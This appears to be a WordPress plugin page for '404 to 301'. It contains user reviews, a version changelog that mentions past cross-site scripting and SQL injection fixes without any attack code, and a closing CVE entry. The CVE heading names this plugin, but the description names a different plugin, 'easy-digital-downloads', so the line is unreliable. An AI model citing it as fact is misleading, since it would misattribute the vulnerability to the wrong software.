The redirection worked quite well for a while. But the log table ran full over time, because I nearly forgot about this plugin while working on other construction sites. When I recognized the full log and clicked the clean up button of "404 to 301", the whole server went down immediately! I had to call web hoster to reboot the server. They told me this script made Wordpress open too many mySQL connections, that way used up all RAM, and caused heavy load on HDDs. Bad architecture I guess. First, it shouldn't run endless logging, but terminate itself after a default time. And second, it should clean up the mess in small steps. I must admit that I can't tell, if this issue is legacy and if there's a new version handling things more gracious. But from what I've seen on the screenshots, there don't seem to have been many essential improvements over the last years.

![](https://secure.gravatar.com/avatar/7a34a598493fb9163e980985edb9bf6a?s=60&d=retro&r=g)

This plugin is very nice for me. I like the option that I could redirect the error 404 to a personal page, it is very useful for me.

![](https://secure.gravatar.com/avatar/d76314ab38ad06c239316e72e50543a5?s=60&d=retro&r=g)

This plug-in does a great job for us, we use an other plugin that is restricting the access of our pages, when an access to one of our pages is done the oter plugin generate a 404 error, at this time this plugin enter in action and redirect the user to the login page! Simple!

![](https://secure.gravatar.com/avatar/b24ec3d63fa67ab3df8221d25773e9fb?s=60&d=retro&r=g)

Really worth getting this plugin, made my life a lot easier

Read all 252 reviews

“404 to 301 – Redirect, Log and Notify 404 Errors” is open source software. The following people have contributed to this plugin.

Contributors

**3.1.1 (15/11/2021)**

**👌 Improvements**

*   Security checks and improvements.

**3.1.0 (18/10/2021)**

**👌 Improvements**

*   Tested with WP 5.8.
*   Added sanitization.

**3.0.9 (06/10/2021)**

**👌 Improvements**

*   Added nonce verification for bulk actions.

**3.0.8 (12/06/2021)**

**👌 Improvements**

*   Tested with WP 5.7.
*   Add capability checks for ajax actions – Thanks Jerome.
*   Improve query preparations – Thanks Jerome.

**3.0.7 (28/01/2021)**

**🐛 Bug Fixes**

*   Activation hook was not being executed.
*   Table creation failed in new installations.

**3.0.6 (18/12/2020)**

**👌 Improvements**

*   Tested with WP 5.6.
*   Small improvements.
*   Temporarily disabled Freemius SDK.

**3.0.5 (02/07/2019)**

**👌 Improvements**

*   Updated Freemius SDK.
*   Tested with WP 5.2.

**3.0.4 (16/03/2019)**

**📦 New**

*   Added option to disable URL guessing.
*   Added review notice.

**3.0.3 (15/03/2019)**

**🐛 Bug Fixes**

*   Opt-in is disabled temporarily to debug the issues.

**3.0.2 (26/02/2019)**

**🐛 Bug Fixes**

*   Security fix.

**👌 Improvements**

*   Minor performance improvements.

**3.0.1 (24/08/2018)**

**👌 Improvements**

*   Make release automated.

**🐛 Bug Fixes**

*   Do not include exclude path items.

**3.0.0.1 (25/06/2018)**

**Bug Fixes**

*   Using template\_redirect hook for redirect instead of wp hook.
*   Fixed an issue with do\_action in Freemius SDK.

**3.0.0 (20/06/2018)**

**New Features**

*   Individual optional settings for each error log item (Individual redirec, log, email alert can be set).
*   Clear error logs without removing custom redirects.
*   Added error logs grouping with count.
*   WPML compatible.
*   Integrated Freemius for addon, support and analytics (optional).

**Improvements**

*   Complete code revamp. More improved structure.
*   Set custom options from previous logs if same item exists.
*   Made 3rd party integration easier.

**2.3.3 (31/08/2016)**

**Bug Fixes**

*   Using esc\_url() for Ref and Url fields.
*   Fixed Cross Site Scripting vulnerability in “From” column – Thanks to Plugin Vulnerabilities.

**2.3.1 (27/08/2016)**

**Bug Fixes**

*   Fixed Cross Site Scripting vulnerability – Thanks to Summer of Pwnage & Louis Dion-Marcil.
*   Fixed sorting issue in error log (Changed default order to Date Descending order).
*   Fixed issues when trailing slash found at the end of custom redirect.

**Improvements**

*   Tested with WordPress 4.6.

**2.3.0 (17/08/2016)**

**Bug Fixes**

*   Removed unused UAN button from help page.
*   Completely safe to use.
*   Tracking completely removed from the plugin since it was detected as spam. Read more here.

**2.2.9 (16/08/2016)**

**Bug Fixes**

*   Serious issue fixed – Usage tracking script was being detected as spam.
*   Removed tracking completely.

**2.2.8 (12/07/2016)**

**Bug Fixes**

*   Fixed a minor bug on TOC button.

**2.2.7 (07/07/2016)**

**Bug Fixes**

*   Fixed issue with PHP 5.4 – Empty error log data.

**Improvements**

*   Improved condition checking.
*   Speed improvements.
*   Made error log link to new tab.

**2.2.6 (30/06/2016)**

**Bug Fixes**

*   Fixed issue – Undefined index when accessed directly.

**Improvements**

*   Improved condition checking.

**2.2.5 (05/06/2016)**

**Bug Fixes**

*   Fixed issue – Front end was slow.

**2.2.4 (02/06/2016)**

**Bug Fixes**

*   Fixed custom redirect issue.
*   Fixed issues when activating.

**2.2.2 (01/06/2016)**

**New Feature**

*   Now you can set **custom redirects** for reach error path.
*   Goto error logs list and set custom redirect.
*   Fixed issues with BuddyPress.

**Improvements**

*   Improved code.

**2.1.7 (20/04/2016)**

**New Add-on**

*   New Log Manager add-on available now.
*   Get periodic email alerts instead of instant email alerts for every errors (add-on).
*   Automatically clear error logs (add-on).

**Improvements**

*   Removed inactive filter – i4t3\_before\_404\_redirect

**2.1.6 (06/04/2016)**

**Improvements**

*   Fixed broken plugin website links.
*   Tested with WordPress 4.5.

**2.1.5 (22/03/2016)**

**Improvements**

*   Fixed issues with deprecated functions – Thanks to Pedro Mendonça.
*   Translated missing strings.
*   Tested with WordPress 4.4.2.

**2.1.4 (22/01/2016)**

**Bug Fixes**

*   Fixed issues when clearing logs (header already sent..).
*   Tested with WordPress 4.4.1.

**2.1.3 (20/12/2015)**

**Bug Fixes**

*   Fixed issues with older version of WordPress.
*   Fixed issues with older version of PHP.

**2.1.0 (20/12/2015)**

**New Feature**

*   New option to set items per page from error log listing page.
*   New option to show or hide items from listing table (Screen option).

**Improvements**

*   Improved error listing page table structure.

**Bug Fixes**

*   Fixed issue – Null value issue when no Referrer or User Agent found.
*   Fixed issue – Clearing errors and redirecting.

**2.0.9 (2/11/2015)**

**Bug Fixes**

*   Fixed issue – Empty needle issue after 2.0.8 update.

**2.0.8 (28/10/2015)**

**New Feature**

*   New option to exclude paths from error logs and redirect.

**Bug Fixes**

*   Fixed issue – Email notifications are being sent even after disabling it.
*   Fixed issue – Settings reset after reactivation of plugin.

**2.0.7 (25/09/2015)**

**New Feature**

*   New option to change error notification email address.
*   Now **100% Translation ready**.

**Improvements**

*   Minor code improvements.

**2.0.6 (13/09/2015)**

**Improvements**

*   Introduced new website for the plugin.
*   Fixed few dead link issues

**2.0.5 (03/09/2015)**

**Improvements**

*   Added option to avoid search engine crawlers/bots from logging errors.

**Bug Fixes**

*   Fixed error log per page issue.

**2.0.4 (26/08/2015)**

**Bug Fixes**

*   Fixed an issue where error log table is not being created.

**2.0.3 (21/08/2015)**

**Bug Fixes**

*   Fixed a serious issue which may cause SQL injection attack.

**2.0.2 (16/08/2015)**

**Bug Fixes**

*   Fixed an issue with https redirect.
*   Fixed an issue with url preg\_match.

**2.0.1 (29/07/2015)**

**New Feature**

*   Now you can log/monitor all 404 errors (optional).
*   You can get email notifications on 404 errors (optional).
*   You can select existing pages from dropdown to set as redirect page.
*   New plugin home page.

**Improvements**

*   Upgraded to WordPress plugin coding standard.
*   Documented all functions.

**1.0.8**

*   Very minor bug fix
*   Tested for WP 4.2

**1.0.7**

*   Fixed options saving issue in admin page.
*   Improved performance.

**1.0.6**

*   Tested with latest version.
*   Improved structure.

**1.0.5**

*   Bug fix.
*   Fixed permission issue on redirect link on plugin activation.

**1.0.4**

*   Bug fix.
*   Fixed permission issue on activating along with some security plugins like WordFence.

**1.0.3**

*   Added official support forum.

**1.0.1**

*   Added official website details.

**1.0.0**

*   Added first version with basic options.

CVE-2015-9323: 404 to 301 – Redirect, Log and Notify 404 Errors

The easy-digital-downloads plugin before 2.3.3 for WordPress has SQL injection.

Tag

#sql